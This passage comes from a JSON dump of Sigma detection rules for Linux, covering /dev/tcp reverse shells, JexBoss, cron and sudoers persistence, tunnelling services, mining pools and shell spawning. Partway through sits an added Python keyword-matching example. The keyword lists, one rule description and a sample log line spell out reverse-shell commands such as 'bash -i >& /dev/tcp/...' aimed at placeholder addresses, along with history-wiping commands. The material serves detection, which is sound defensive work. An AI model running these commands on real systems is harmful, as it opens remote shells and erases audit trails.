    "content": "title: Suspicious Use of /dev/tcp\nid: 6cc5fceb-9a71-4c23-aeeb-963abe0b279c\nstatus: test\ndescription: Detects suspicious command with /dev/tcp\nreferences:\n    - https://www.andreafortuna.org/2021/03/06/some-useful-tips-about-dev-tcp/\n    - https://book.hacktricks.xyz/shells/shells/linux\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-1---port-scan\nauthor: frack113\ndate: 2021-12-10\nmodified: 2023-01-06\ntags:\n    - attack.reconnaissance\nlogsource:\n    product: linux\ndetection:\n    keywords:\n        - 'cat </dev/tcp/'\n        - 'exec 3<>/dev/tcp/'\n        - 'echo >/dev/tcp/'\n        - 'bash -i >& /dev/tcp/'\n        - 'sh -i >& /dev/udp/'\n        - '0<&196;exec 196<>/dev/tcp/'\n        - 'exec 5<>/dev/tcp/'\n        - '(sh)0>/dev/tcp/'\n        - 'bash -c ''bash -i >& /dev/tcp/'\n        - 'echo -e ''#!/bin/bash\\nbash -i >& /dev/tcp/'\n    condition: keywords\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/linux/builtin/lnx_susp_jexboss.yml",
    "content": "title: JexBoss Command Sequence\nid: 8ec2c8b4-557a-4121-b87c-5dfb3a602fae\nstatus: test\ndescription: Detects a suspicious command sequence used by JexBoss\nreferences:\n    - https://www.us-cert.gov/ncas/analysis-reports/AR18-312A\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-08-24\nmodified: 2025-11-22\ntags:\n    - attack.execution\n    - attack.t1059.004\nlogsource:\n    product: linux\ndetection:\n    keywords:\n        '|all':\n            - 'bash -c /bin/bash'\n            - '&/dev/tcp/'\n    condition: keywords\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
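Most rules in this directory are plain `keywords` rules: a case-insensitive substring match over the whole log line with `*`/`?` wildcards, any-of within a list, `'|all'` for all-of (the JexBoss rule above), and `all of selection_*` across named selections (the privileged-user creation rule earlier). The Python below is an added example, not code from the Sigma project, that evaluates three of those rules (command history tampering, privileged user creation, JexBoss) over constructed log lines; the sample lines and the `bash_audit` tag are made up, and Sigma's backslash escaping of literal wildcards is left out.

```python
import re

# Added example (not part of the Sigma repository): a minimal evaluator for the
# `keywords` rules in this directory, applied to constructed log lines. Sigma keyword
# matching is a case-insensitive substring match over the whole message, with `*`
# (any run) and `?` (one char) wildcards; a list matches if ANY entry matches unless
# the list carries the `|all` modifier (JexBoss rule), and `all of selection_*`
# (privileged-user rule) requires every named selection to match.
# Simplification/assumption: Sigma's backslash escaping of literal `*`/`?` is not handled.


def keyword_to_regex(pattern: str) -> "re.Pattern":
    """Translate one Sigma keyword into a regex used with search() (substring match)."""
    parts = []
    for ch in pattern:
        parts.append(".*" if ch == "*" else "." if ch == "?" else re.escape(ch))
    return re.compile("".join(parts), re.IGNORECASE | re.DOTALL)


class KeywordGroup:
    """One keyword list; `require_all=True` models the `'|all'` modifier."""

    def __init__(self, patterns, require_all=False):
        self.patterns = list(patterns)
        self.regexes = [keyword_to_regex(p) for p in self.patterns]
        self.require_all = require_all

    def hits(self, message: str):
        found = [p for p, rx in zip(self.patterns, self.regexes) if rx.search(message)]
        if self.require_all and len(found) != len(self.patterns):
            return []
        return found


def evaluate(groups, message: str):
    """Condition `all of selection_*`: every group must hit. Returns matched keywords or None."""
    matched = []
    for group in groups:
        found = group.hits(message)
        if not found:
            return None
        matched.extend(found)
    return matched


# Keyword lists copied from the rules on this page.
RULES = {
    "Linux Command History Tampering": [KeywordGroup([
        'cat /dev/null >*sh_history', 'cat /dev/zero >*sh_history', 'chattr +i*sh_history',
        'echo "" >*sh_history', 'empty_bash_history', 'export HISTFILESIZE=0', 'history -c',
        'history -w', 'ln -sf /dev/null *sh_history', 'ln -sf /dev/zero *sh_history',
        'rm *sh_history', 'shopt -ou history', 'shopt -uo history', 'shred *sh_history',
        'truncate -s0 *sh_history',
    ])],
    "Privileged User Has Been Created": [
        KeywordGroup(['new user']),
        KeywordGroup(['GID=0,', 'UID=0,', 'GID=10,', 'GID=27,']),
    ],
    "JexBoss Command Sequence": [
        KeywordGroup(['bash -c /bin/bash', '&/dev/tcp/'], require_all=True),
    ],
}

# Constructed sample lines (not real captures); 203.0.113.5 is a documentation address.
SAMPLE_LINES = [
    'Dec 21 17:13:54 testserver useradd[1337]: new user: name=john, UID=0, GID=0, home=/home/john, shell=/bin/bash',
    # UID=1000 / GID=100: the trailing comma in "UID=0," and "GID=10," keeps this from matching
    'Dec 21 17:30:22 testserver useradd[1337]: new user: name=butter4, UID=1000, GID=100, home=/home/butter4, shell=/bin/bash',
    'Dec 22 09:01:02 web01 bash_audit[2201]: user=www-data cmd="history -c; cat /dev/null > ~/.bash_history"',
    'Dec 22 09:05:10 app02 sh[3301]: /bin/sh -c "bash -c /bin/bash -i >&/dev/tcp/203.0.113.5/4444 0>&1"',
    # only the first JexBoss keyword is present, so `|all` keeps this quiet
    'Dec 22 09:06:00 app02 sh[3302]: bash -c /bin/bash /opt/app/start.sh',
]


def scan(lines=SAMPLE_LINES):
    """Return (line number, rule title, matched keywords) for every firing rule."""
    alerts = []
    for n, line in enumerate(lines, start=1):
        for title, groups in RULES.items():
            matched = evaluate(groups, line)
            if matched:
                alerts.append((n, title, matched))
    return alerts


if __name__ == "__main__":
    for alert in scan():
        print("ALERT", alert)
```

Lines 1, 3 and 4 fire; line 2 shows why the rule's `UID=0,`/`GID=10,` patterns end in a comma (so `UID=1000,` and `GID=100,` do not match), and line 5 shows `'|all'` suppressing a partial JexBoss match.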
  {
    "path": "rules/linux/builtin/lnx_symlink_etc_passwd.yml",
    "content": "title: Symlink Etc Passwd\nid: c67fc22a-0be5-4b4f-aad5-2b32c4b69523\nstatus: test\ndescription: Detects suspicious command lines that look as if they would create symbolic links to /etc/passwd\nreferences:\n    - https://www.qualys.com/2021/05/04/21nails/21nails.txt\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-04-05\nmodified: 2021-11-27\ntags:\n    - attack.t1204.001\n    - attack.execution\nlogsource:\n    product: linux\ndetection:\n    keywords:\n        - 'ln -s -f /etc/passwd'\n        - 'ln -s /etc/passwd'\n    condition: keywords\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/builtin/sshd/lnx_sshd_susp_ssh.yml",
    "content": "title: Suspicious OpenSSH Daemon Error\nid: e76b413a-83d0-4b94-8e4c-85db4a5b8bdc\nstatus: test\ndescription: Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts\nreferences:\n    - https://github.com/openssh/openssh-portable/blob/c483a5c0fb8e8b8915fad85c5f6113386a4341ca/ssherr.c\n    - https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-06-30\nmodified: 2021-11-27\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    product: linux\n    service: sshd\ndetection:\n    keywords:\n        - 'unexpected internal error'\n        - 'unknown or unsupported key type'\n        - 'invalid certificate signing key'\n        - 'invalid elliptic curve value'\n        - 'incorrect signature'\n        - 'error in libcrypto'\n        - 'unexpected bytes remain after decoding'\n        - 'fatal: buffer_get_string: bad string'\n        - 'Local: crc32 compensation attack'\n        - 'bad client public DH value'\n        - 'Corrupted MAC on input'\n    condition: keywords\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/linux/builtin/syslog/lnx_syslog_security_tools_disabling_syslog.yml",
    "content": "title: Disabling Security Tools - Builtin\nid: 49f5dfc1-f92e-4d34-96fa-feba3f6acf36\nrelated:\n    - id: e3a8a052-111f-4606-9aee-f28ebeb76776\n      type: derived\nstatus: test\ndescription: Detects disabling security tools\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md\nauthor: Ömer Günal, Alejandro Ortuno, oscd.community\ndate: 2020-06-17\nmodified: 2022-11-26\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\nlogsource:\n    product: linux\n    service: syslog\ndetection:\n    keywords:\n        - 'stopping iptables'\n        - 'stopping ip6tables'\n        - 'stopping firewalld'\n        - 'stopping cbdaemon'\n        - 'stopping falcon-sensor'\n    condition: keywords\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/linux/builtin/syslog/lnx_syslog_susp_named.yml",
    "content": "title: Suspicious Named Error\nid: c8e35e96-19ce-4f16-aeb6-fd5588dc5365\nstatus: test\ndescription: Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts\nreferences:\n    - https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/named_rules.xml\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-02-20\nmodified: 2022-10-05\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    product: linux\n    service: syslog\ndetection:\n    keywords:\n        - ' dropping source port zero packet from '\n        - ' denied AXFR from '\n        - ' exiting (due to fatal error)'\n    condition: keywords\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/builtin/vsftpd/lnx_vsftpd_susp_error_messages.yml",
    "content": "title: Suspicious VSFTPD Error Messages\nid: 377f33a1-4b36-4ee1-acee-1dbe4b43cfbe\nstatus: test\ndescription: Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts\nreferences:\n    - https://github.com/dagwieers/vsftpd/\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-07-05\nmodified: 2021-11-27\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    product: linux\n    service: vsftpd\ndetection:\n    keywords:\n        - 'Connection refused: too many sessions for this address.'\n        - 'Connection refused: tcp_wrappers denial.'\n        - 'Bad HTTP verb.'\n        - 'port and pasv both active'\n        - 'pasv and port both active'\n        - 'Transfer done (but failed to open directory).'\n        - 'Could not set file modification time.'\n        - 'bug: pid active in ptrace_sandbox_free'\n        - 'PTRACE_SETOPTIONS failure'\n        - 'weird status:'\n        - 'couldn''t handle sandbox event'\n        - 'syscall * out of bounds'\n        - 'syscall not permitted:'\n        - 'syscall validate failed:'\n        - 'Input line too long.'\n        - 'poor buffer accounting in str_netfd_alloc'\n        - 'vsf_sysutil_read_loop'\n    condition: keywords\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/linux/file_event/file_event_lnx_doas_conf_creation.yml",
    "content": "title: Linux Doas Conf File Creation\nid: 00eee2a5-fdb0-4746-a21d-e43fbdea5681\nstatus: stable\ndescription: Detects the creation of the doas.conf file on a Linux host.\nreferences:\n    - https://research.splunk.com/endpoint/linux_doas_conf_file_creation/\n    - https://www.makeuseof.com/how-to-install-and-use-doas/\nauthor: Sittikorn S, Teoderick Contreras\ndate: 2022-01-20\nmodified: 2022-12-31\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548\nlogsource:\n    product: linux\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith: '/etc/doas.conf'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: medium\n"
  },
  {
    "path": "rules/linux/file_event/file_event_lnx_persistence_cron_files.yml",
    "content": "title: Persistence Via Cron Files\nid: 6c4e2f43-d94d-4ead-b64d-97e53fa2bd05\nstatus: test\ndescription: Detects the creation of cron files or of files in cron directories, which could indicate persistence.\nreferences:\n    - https://github.com/microsoft/MSTIC-Sysmon/blob/f1477c0512b0747c1455283069c21faec758e29d/linux/configs/attack-based/persistence/T1053.003_Cron_Activity.xml\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC\ndate: 2021-10-15\nmodified: 2022-12-31\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053.003\nlogsource:\n    product: linux\n    category: file_event\ndetection:\n    selection1:\n        TargetFilename|startswith:\n            - '/etc/cron.d/'\n            - '/etc/cron.daily/'\n            - '/etc/cron.hourly/'\n            - '/etc/cron.monthly/'\n            - '/etc/cron.weekly/'\n            - '/var/spool/cron/crontabs/'\n    selection2:\n        TargetFilename|contains:\n            - '/etc/cron.allow'\n            - '/etc/cron.deny'\n            - '/etc/crontab'\n    condition: 1 of selection*\nfalsepositives:\n    - Any legitimate cron file.\nlevel: medium\n"
  },
  {
    "path": "rules/linux/file_event/file_event_lnx_persistence_sudoers_files.yml",
    "content": "title: Persistence Via Sudoers Files\nid: ddb26b76-4447-4807-871f-1b035b2bfa5d\nstatus: test\ndescription: Detects the creation of sudoers files or of files in the \"sudoers.d\" directory, which can be used as a method to persist privileges for a specific user.\nreferences:\n    - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-05\nmodified: 2022-12-31\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053.003\nlogsource:\n    product: linux\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|startswith: '/etc/sudoers.d/'\n    condition: selection\nfalsepositives:\n    - Creation of legitimate files in sudoers.d folder part of administrator work\nlevel: medium\n"
  },
  {
    "path": "rules/linux/file_event/file_event_lnx_susp_filename_with_embedded_base64_command.yml",
    "content": "title: Suspicious Filename with Embedded Base64 Commands\nid: 179b3686-6271-4d87-807d-17d843a8af73\nstatus: experimental\ndescription: |\n    Detects files with specially crafted filenames that embed Base64-encoded bash payloads designed to execute when processed by shell scripts.\n    These filenames exploit shell interpretation quirks to trigger hidden commands, a technique observed in VShell malware campaigns.\nreferences:\n    - https://www.trellix.com/blogs/research/the-silent-fileless-threat-of-vshell/\nauthor: '@kostastsale'\ndate: 2025-11-22\ntags:\n    - attack.execution\n    - attack.t1059.004\n    - attack.defense-evasion\n    - attack.t1027\nlogsource:\n    product: linux\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|contains:\n            - '{echo'\n            - '{base64,-d}'\n    condition: selection\nfalsepositives:\n    - Legitimate files with similar naming patterns (very unlikely).\nlevel: high\n"
  },
  {
    "path": "rules/linux/file_event/file_event_lnx_susp_shell_script_under_profile_directory.yml",
    "content": "title: Potentially Suspicious Shell Script Creation in Profile Folder\nid: 13f08f54-e705-4498-91fd-cce9d9cee9f1\nstatus: test\ndescription: Detects the creation of shell scripts under the \"profile.d\" path.\nreferences:\n    - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html\n    - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/\n    - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection\n    - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2023-06-02\ntags:\n    - attack.persistence\nlogsource:\n    product: linux\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|contains: '/etc/profile.d/'\n        TargetFilename|endswith:\n            - '.csh'\n            - '.sh'\n    condition: selection\nfalsepositives:\n    - Legitimate shell scripts in the \"profile.d\" directory could be common in your environment. Apply additional filter accordingly via \"image\", by adding specific filenames you \"trust\" or by correlating it with other events.\n    - Regular file creation during system update or software installation by the package manager\nlevel: low # Can be increased to a higher level after some tuning\n"
  },
  {
    "path": "rules/linux/file_event/file_event_lnx_triple_cross_rootkit_lock_file.yml",
    "content": "title: Triple Cross eBPF Rootkit Default LockFile\nid: c0239255-822c-4630-b7f1-35362bcb8f44\nstatus: test\ndescription: Detects the creation of the file \"rootlog\" which is used by the TripleCross rootkit as a way to check if the backdoor is already running.\nreferences:\n    - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L33\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-05\nmodified: 2022-12-31\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: linux\n    category: file_event\ndetection:\n    selection:\n        TargetFilename: '/tmp/rootlog'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/linux/file_event/file_event_lnx_triple_cross_rootkit_persistence.yml",
    "content": "title: Triple Cross eBPF Rootkit Default Persistence\nid: 1a2ea919-d11d-4d1e-8535-06cda13be20f\nstatus: test\ndescription: Detects the creation of \"ebpfbackdoor\" files in both \"cron.d\" and \"sudoers.d\" directories. Which both are related to the TripleCross persistence method\nreferences:\n    - https://github.com/h3xduck/TripleCross/blob/12629558b8b0a27a5488a0b98f1ea7042e76f8ab/apps/deployer.sh\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-05\nmodified: 2022-12-31\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1053.003\n\nlogsource:\n    product: linux\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith: 'ebpfbackdoor'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/linux/file_event/file_event_lnx_wget_download_file_in_tmp_dir.yml",
    "content": "title: Wget Creating Files in Tmp Directory\nid: 35a05c60-9012-49b6-a11f-6bab741c9f74\nstatus: test\ndescription: Detects the use of wget to download content in a temporary directory such as \"/tmp\" or \"/var/tmp\"\nreferences:\n    - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html\n    - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/\n    - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection\n    - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2023-06-02\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    product: linux\n    category: file_event\ndetection:\n    selection:\n        Image|endswith: '/wget'\n        TargetFilename|startswith:\n            - '/tmp/'\n            - '/var/tmp/'\n    condition: selection\nfalsepositives:\n    - Legitimate downloads of files in the tmp folder.\nlevel: medium\n"
  },
  {
    "path": "rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml",
    "content": "title: Linux Reverse Shell Indicator\nid: 83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871\nstatus: test\ndescription: Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')\nreferences:\n    - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-10-16\nmodified: 2022-12-25\ntags:\n    - attack.execution\n    - attack.t1059.004\nlogsource:\n    product: linux\n    category: network_connection\ndetection:\n    selection:\n        Image|endswith: '/bin/bash'\n    filter:\n        DestinationIp:\n            - '127.0.0.1'\n            - '0.0.0.0'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/linux/network_connection/net_connection_lnx_crypto_mining_indicators.yml",
    "content": "title: Linux Crypto Mining Pool Connections\nid: a46c93b7-55ed-4d27-a41b-c259456c4746\nstatus: stable\ndescription: Detects process connections to a Monero crypto mining pool\nreferences:\n    - https://www.poolwatch.io/coin/monero\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-10-26\ntags:\n    - attack.impact\n    - attack.t1496\nlogsource:\n    product: linux\n    category: network_connection\ndetection:\n    selection:\n        DestinationHostname:\n            - 'pool.minexmr.com'\n            - 'fr.minexmr.com'\n            - 'de.minexmr.com'\n            - 'sg.minexmr.com'\n            - 'ca.minexmr.com'\n            - 'us-west.minexmr.com'\n            - 'pool.supportxmr.com'\n            - 'mine.c3pool.com'\n            - 'xmr-eu1.nanopool.org'\n            - 'xmr-eu2.nanopool.org'\n            - 'xmr-us-east1.nanopool.org'\n            - 'xmr-us-west1.nanopool.org'\n            - 'xmr-asia1.nanopool.org'\n            - 'xmr-jp1.nanopool.org'\n            - 'xmr-au1.nanopool.org'\n            - 'xmr.2miners.com'\n            - 'xmr.hashcity.org'\n            - 'xmr.f2pool.com'\n            - 'xmrpool.eu'\n            - 'pool.hashvault.pro'\n            - 'moneroocean.stream'\n            - 'monerocean.stream'\n    condition: selection\nfalsepositives:\n    - Legitimate use of crypto miners\nlevel: high\n"
  },
  {
    "path": "rules/linux/network_connection/net_connection_lnx_domain_localtonet_tunnel.yml",
    "content": "title: Communication To LocaltoNet Tunneling Service Initiated - Linux\nid: c4568f5d-131f-4e78-83d4-45b2da0ec4f1\nstatus: test\ndescription: |\n    Detects an executable initiating a network connection to \"LocaltoNet\" tunneling sub-domains.\n    LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet.\n    Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.\nreferences:\n    - https://localtonet.com/documents/supported-tunnels\n    - https://cloud.google.com/blog/topics/threat-intelligence/unc3944-targets-saas-applications\nauthor: Andreas Braathen (mnemonic.io)\ndate: 2024-06-17\ntags:\n    - attack.command-and-control\n    - attack.t1572\n    - attack.t1090\n    - attack.t1102\nlogsource:\n    category: network_connection\n    product: linux\ndetection:\n    selection:\n        DestinationHostname|endswith:\n            - '.localto.net'\n            - '.localtonet.com'\n        Initiated: 'true'\n    condition: selection\nfalsepositives:\n    - Legitimate use of the LocaltoNet service.\nlevel: high\n"
  },
  {
    "path": "rules/linux/network_connection/net_connection_lnx_ngrok_tunnel.yml",
    "content": "title: Communication To Ngrok Tunneling Service - Linux\nid: 19bf6fdb-7721-4f3d-867f-53467f6a5db6\nstatus: test\ndescription: Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors\nreferences:\n    - https://twitter.com/hakluke/status/1587733971814977537/photo/1\n    - https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-11-03\ntags:\n    - attack.exfiltration\n    - attack.command-and-control\n    - attack.t1567\n    - attack.t1568.002\n    - attack.t1572\n    - attack.t1090\n    - attack.t1102\n    - attack.s0508\nlogsource:\n    product: linux\n    category: network_connection\ndetection:\n    selection:\n        DestinationHostname|contains:\n            - 'tunnel.us.ngrok.com'\n            - 'tunnel.eu.ngrok.com'\n            - 'tunnel.ap.ngrok.com'\n            - 'tunnel.au.ngrok.com'\n            - 'tunnel.sa.ngrok.com'\n            - 'tunnel.jp.ngrok.com'\n            - 'tunnel.in.ngrok.com'\n    condition: selection\nfalsepositives:\n    - Legitimate use of ngrok\nlevel: high\n"
  },
  {
    "path": "rules/linux/network_connection/net_connection_lnx_susp_malware_callback_port.yml",
    "content": "title: Potentially Suspicious Malware Callback Communication - Linux\nid: dbfc7c98-04ab-4ab7-aa94-c74d22aa7376\nrelated:\n    - id: 4b89abaa-99fe-4232-afdd-8f9aa4d20382\n      type: derived\nstatus: test\ndescription: |\n    Detects programs that connect to known malware callback ports based on threat intelligence reports.\nreferences:\n    - https://www.mandiant.com/resources/blog/triton-actor-ttp-profile-custom-attack-tools-detections\n    - https://www.mandiant.com/resources/blog/ukraine-and-sandworm-team\n    - https://www.elastic.co/guide/en/security/current/potential-non-standard-port-ssh-connection.html\n    - https://thehackernews.com/2024/01/systembc-malwares-c2-server-analysis.html\n    - https://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors\nauthor: hasselj\ndate: 2024-05-10\ntags:\n    - attack.persistence\n    - attack.command-and-control\n    - attack.t1571\nlogsource:\n    category: network_connection\n    product: linux\ndetection:\n    selection:\n        Initiated: 'true'\n        DestinationPort:\n            - 888\n            - 999\n            - 2200\n            - 2222\n            - 4000\n            - 4444\n            - 6789\n            - 8531\n            - 50501\n            - 51820\n    filter_main_local_ranges:\n        DestinationIp|cidr:\n            - '127.0.0.0/8'\n            - '10.0.0.0/8'\n            - '172.16.0.0/12'\n            - '192.168.0.0/16'\n            - '169.254.0.0/16'\n            - '::1/128'         # IPv6 loopback\n            - 'fe80::/10'       # IPv6 link-local addresses\n            - 'fc00::/7'        # IPv6 private addresses\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_apt_shell_execution.yml",
    "content": "title: Shell Invocation via Apt - Linux\nid: bb382fd5-b454-47ea-a264-1828e4c766d6\nstatus: test\ndescription: |\n    Detects the use of the \"apt\" and \"apt-get\" commands to execute a shell or proxy commands.\n    Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.\nreferences:\n    - https://gtfobins.github.io/gtfobins/apt/\n    - https://gtfobins.github.io/gtfobins/apt-get/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-28\nmodified: 2024-09-02\ntags:\n    - attack.discovery\n    - attack.t1083\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith:\n            - '/apt'\n            - '/apt-get'\n        CommandLine|contains: 'APT::Update::Pre-Invoke::='\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_at_command.yml",
    "content": "title: Scheduled Task/Job At\nid: d2d642d7-b393-43fe-bae4-e81ed5915c4b\nstatus: stable\ndescription: |\n  Detects the use of at/atd which are utilities that are used to schedule tasks.\n  They are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md\nauthor: Ömer Günal, oscd.community\ndate: 2020-10-06\nmodified: 2022-07-07\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053.002\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith:\n            - '/at'\n            - '/atd'\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_auditctl_clear_rules.yml",
    "content": "title: Audit Rules Deleted Via Auditctl\nid: bed26dea-4525-47f4-b24a-76e30e44ffb0\nstatus: experimental\ndescription: |\n    Detects the execution of 'auditctl' with the '-D' command line parameter, which deletes all configured audit rules and watches on Linux systems.\n    This technique is commonly used by attackers to disable audit logging and cover their tracks by removing monitoring capabilities.\n    Removal of audit rules can significantly impair detection of malicious activities on the affected system.\nreferences:\n    - https://www.atomicredteam.io/atomic-red-team/atomics/T1562.012\n    - https://linux.die.net/man/8/auditct\nauthor: Mohamed LAKRI\ndate: 2025-10-17\ntags:\n    - attack.defense-evasion\n    - attack.t1562.012\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '/auditctl'\n        CommandLine|re: '-D'\n    condition: selection\nfalsepositives:\n    - An administrator troubleshooting. Investigate all attempts.\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_av_kaspersky_av_disabled.yml",
    "content": "title: Kaspersky Endpoint Security Stopped Via CommandLine - Linux\nid: 36388120-b3f1-4ce9-b50b-280d9a7f4c04\nstatus: experimental\ndescription: |\n  Detects execution of the Kaspersky init.d stop script on Linux systems either directly or via systemctl.\n  This activity may indicate a manual interruption of the antivirus service by an administrator, or it could be a sign of potential tampering or evasion attempts by malicious actors.\nreferences:\n    - https://support.kaspersky.com/KES4Linux/12.0.0/en-US/197929.htm\nauthor: Milad Cheraghi\ndate: 2025-10-18\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith:\n            # Note: Add the list of shells allowed in your environment that can be used to run init.d scripts.\n            - '/systemctl'\n            - '/bash'\n            - '/sh'\n        CommandLine|contains|all:\n            - 'stop'\n            - 'kesl'\n    condition: selection\nfalsepositives:\n    - System administrator manually stopping Kaspersky services\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_awk_shell_spawn.yml",
    "content": "title: Suspicious Invocation of Shell via AWK - Linux\nid: 8c1a5675-cb85-452f-a298-b01b22a51856\nstatus: test\ndescription: |\n    Detects the execution of \"awk\" or it's sibling commands, to invoke a shell using the system() function.\n    This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.\nreferences:\n    - https://gtfobins.github.io/gtfobins/awk/#shell\n    - https://gtfobins.github.io/gtfobins/gawk/#shell\n    - https://gtfobins.github.io/gtfobins/nawk/#shell\n    - https://gtfobins.github.io/gtfobins/mawk/#shell\nauthor: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)\ndate: 2024-09-02\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_img:\n        Image|endswith:\n            - '/awk'\n            - '/gawk'\n            - '/mawk'\n            - '/nawk'\n        CommandLine|contains: 'BEGIN {system'\n    selection_cli:\n        CommandLine|contains:\n            - '/bin/bash'\n            - '/bin/dash'\n            - '/bin/fish'\n            - '/bin/sh'\n            - '/bin/zsh'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
